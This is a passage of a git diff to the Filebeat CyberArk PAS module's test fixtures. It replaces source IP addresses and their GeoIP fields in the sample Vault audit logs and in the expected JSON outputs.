Version","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_VAGRANT.LiveSessions","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}}
 <5>1 2021-03-14T12:07:32Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 05:07:32</Timestamp>\n    <IsoTimestamp>2021-03-14T12:07:32Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>62</MessageID>\n    <Desc>Create File Version</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>Create File Version</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>AccountsFeedDiscoveryLogs</Safe>\n    <File>Root\\Windows discovery from ELASTIC.local_PasswordManager_UID1.log</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Create File Version</Message>\n    <GatewayStation>10.0.1.20</GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:07:32","IsoTimestamp":"2021-03-14T12:07:32Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PasswordManager","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"AccountsFeedDiscoveryLogs","File":"Root\\Windows discovery from ELASTIC.local_PasswordManager_UID1.log","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":"10.0.1.20"}}}
-<5>1 2021-03-14T12:57:27Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 05:57:27</Timestamp>\n    <IsoTimestamp>2021-03-14T12:57:27Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>62</MessageID>\n    <Desc>Create File Version</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMPApp_SSH</Issuer>\n    <Action>Create File Version</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSMPLiveSessions</Safe>\n    <File>Root\\PSMPApp_SSH.LiveSessions</File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Create File Version</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:27","IsoTimestamp":"2021-03-14T12:57:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PSMPApp_SSH","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_SSH.LiveSessions","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}}
+<5>1 2021-03-14T12:57:27Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 05:57:27</Timestamp>\n    <IsoTimestamp>2021-03-14T12:57:27Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>62</MessageID>\n    <Desc>Create File Version</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMPApp_SSH</Issuer>\n    <Action>Create File Version</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSMPLiveSessions</Safe>\n    <File>Root\\PSMPApp_SSH.LiveSessions</File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Create File Version</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:27","IsoTimestamp":"2021-03-14T12:57:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PSMPApp_SSH","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_SSH.LiveSessions","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}}
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/62_create_file_version.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/62_create_file_version.log-expected.json
index 0656cfa58ab5..9abceee6faea 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/62_create_file_version.log-expected.json
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/62_create_file_version.log-expected.json
@@ -10,7 +10,7 @@
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "PSMPLiveSessions",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 10 01:11:54",
         "event.action": "create file version",
         "event.code": "62",
@@ -30,19 +30,16 @@
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -59,7 +56,7 @@
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "PSMNotifications",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 10 09:58:05",
         "event.action": "create file version",
         "event.code": "62",
@@ -72,26 +69,23 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 664,
+        "log.offset": 663,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -108,7 +102,7 @@
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "PSMLiveSessions",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 10 10:46:47",
         "event.action": "create file version",
         "event.code": "62",
@@ -121,26 +115,23 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 1284,
+        "log.offset": 1282,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -157,7 +148,7 @@
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "PSMLiveSessions",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "35.192.121.42",
+        "cyberarkpas.audit.station": "67.43.156.12",
         "cyberarkpas.audit.timestamp": "Mar 10 14:20:12",
         "event.action": "create file version",
         "event.code": "62",
@@ -170,25 +161,23 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 1912,
+        "log.offset": 1909,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "35.192.121.42"
+            "67.43.156.12"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "35.192.121.42",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 38.6583,
-        "source.geo.location.lon": -77.2481,
-        "source.geo.region_iso_code": "US-VA",
-        "source.geo.region_name": "Virginia",
-        "source.ip": "35.192.121.42",
+        "source.address": "67.43.156.12",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.12",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -219,7 +208,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 2550,
+        "log.offset": 2546,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
@@ -244,11 +233,11 @@
         "cyberarkpas.audit.iso_timestamp": "2021-03-11T16:59:58Z",
         "cyberarkpas.audit.issuer": "PSMPApp_VAGRANT",
         "cyberarkpas.audit.message": "Create File Version",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 08:59:58</Timestamp>\n    <IsoTimestamp>2021-03-11T16:59:58Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>62</MessageID>\n    <Desc>Create File Version</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMPApp_VAGRANT</Issuer>\n    <Action>Create File Version</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSMPLiveSessions</Safe>\n    <File>Root\\PSMPApp_VAGRANT.LiveSessions</File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Create File Version</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 08:59:58</Timestamp>\n    <IsoTimestamp>2021-03-11T16:59:58Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>62</MessageID>\n    <Desc>Create File Version</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMPApp_VAGRANT</Issuer>\n    <Action>Create File Version</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSMPLiveSessions</Safe>\n    <File>Root\\PSMPApp_VAGRANT.LiveSessions</File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Create File Version</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "PSMPLiveSessions",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 11 08:59:58",
         "event.action": "create file version",
         "event.code": "62",
@@ -261,26 +250,23 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 4100,
+        "log.offset": 4096,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -314,7 +300,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 5652,
+        "log.offset": 5646,
         "log.syslog.priority": "5",
         "network.direction": "internal",
         "observer.hostname": "VAULT",
@@ -340,11 +326,11 @@
         "cyberarkpas.audit.iso_timestamp": "2021-03-14T12:57:27Z",
         "cyberarkpas.audit.issuer": "PSMPApp_SSH",
         "cyberarkpas.audit.message": "Create File Version",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 05:57:27</Timestamp>\n    <IsoTimestamp>2021-03-14T12:57:27Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>62</MessageID>\n    <Desc>Create File Version</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMPApp_SSH</Issuer>\n    <Action>Create File Version</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSMPLiveSessions</Safe>\n    <File>Root\\PSMPApp_SSH.LiveSessions</File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Create File Version</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 05:57:27</Timestamp>\n    <IsoTimestamp>2021-03-14T12:57:27Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>62</MessageID>\n    <Desc>Create File Version</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMPApp_SSH</Issuer>\n    <Action>Create File Version</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSMPLiveSessions</Safe>\n    <File>Root\\PSMPApp_SSH.LiveSessions</File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Create File Version</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "PSMPLiveSessions",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "34.71.250.247",
+        "cyberarkpas.audit.station": "81.2.69.143",
         "cyberarkpas.audit.timestamp": "Mar 14 05:57:27",
         "event.action": "create file version",
         "event.code": "62",
@@ -357,23 +343,26 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 7298,
+        "log.offset": 7292,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "34.71.250.247"
+            "81.2.69.143"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "34.71.250.247",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
-        "source.ip": "34.71.250.247",
+        "source.address": "81.2.69.143",
+        "source.geo.city_name": "London",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/7_logon.log b/x-pack/filebeat/module/cyberarkpas/audit/test/7_logon.log
index 82be0d698c1a..2508715a8944 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/7_logon.log
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/7_logon.log
@@ -5,8 +5,8 @@
 <5>1 2021-03-04T19:11:23Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 04 11:11:23","IsoTimestamp":"2021-03-04T19:11:23Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"Prov_COMPONENTS","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":""}}}
 <5>1 2021-03-05T10:18:50Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 05 02:18:50","IsoTimestamp":"2021-03-05T10:18:50Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"PVWAAppUser","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":""}}}
 <5>1 2021-03-08T18:07:51Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:07:51","IsoTimestamp":"2021-03-08T18:07:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"Administrator","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":"10.0.1.20"}}}
-<5>1 2021-03-09T08:32:51Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 09 00:32:51","IsoTimestamp":"2021-03-09T08:32:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"Administrator","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":"10.0.1.20"}}}
-<5>1 2021-03-09T10:14:58Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 09 02:14:58","IsoTimestamp":"2021-03-09T10:14:58Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"Administrator","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"37.223.7.45","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":"10.0.1.20"}}}
-<5>1 2021-03-10T09:11:48Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:48","IsoTimestamp":"2021-03-10T09:11:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"PSMP_ADB_localhost.localdomain","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:48Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:48","IsoTimestamp":"2021-03-10T09:11:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"PSMPApp_localhost.localdomain","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:49Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:49","IsoTimestamp":"2021-03-10T09:11:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"PSMPGW_localhost.localdomain","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":""}}}
+<5>1 2021-03-09T08:32:51Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 09 00:32:51","IsoTimestamp":"2021-03-09T08:32:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"Administrator","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":"10.0.1.20"}}}
+<5>1 2021-03-09T10:14:58Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 09 02:14:58","IsoTimestamp":"2021-03-09T10:14:58Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"Administrator","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"216.160.83.61","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":"10.0.1.20"}}}
+<5>1 2021-03-10T09:11:48Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:48","IsoTimestamp":"2021-03-10T09:11:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"PSMP_ADB_localhost.localdomain","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:48Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:48","IsoTimestamp":"2021-03-10T09:11:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"PSMPApp_localhost.localdomain","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:49Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:49","IsoTimestamp":"2021-03-10T09:11:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"PSMPGW_localhost.localdomain","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":""}}}
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/7_logon.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/7_logon.log-expected.json
index 31636b9a4f03..0c13f19d19a7 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/7_logon.log-expected.json
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/7_logon.log-expected.json
@@ -366,7 +366,7 @@
         "cyberarkpas.audit.message": "Logon",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 09 00:32:51",
         "destination.address": "10.0.1.20",
         "destination.ip": "10.0.1.20",
@@ -397,22 +397,19 @@
         "observer.version": "11.7.0000",
         "related.ip": [
             "10.0.1.20",
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "Administrator"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -429,7 +426,7 @@
         "cyberarkpas.audit.message": "Logon",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "37.223.7.45",
+        "cyberarkpas.audit.station": "216.160.83.61",
         "cyberarkpas.audit.timestamp": "Mar 09 02:14:58",
         "destination.address": "10.0.1.20",
         "destination.ip": "10.0.1.20",
@@ -451,7 +448,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 4908,
+        "log.offset": 4907,
         "log.syslog.priority": "5",
         "network.direction": "inbound",
         "observer.hostname": "VAULT",
@@ -460,22 +457,22 @@
         "observer.version": "11.7.0000",
         "related.ip": [
             "10.0.1.20",
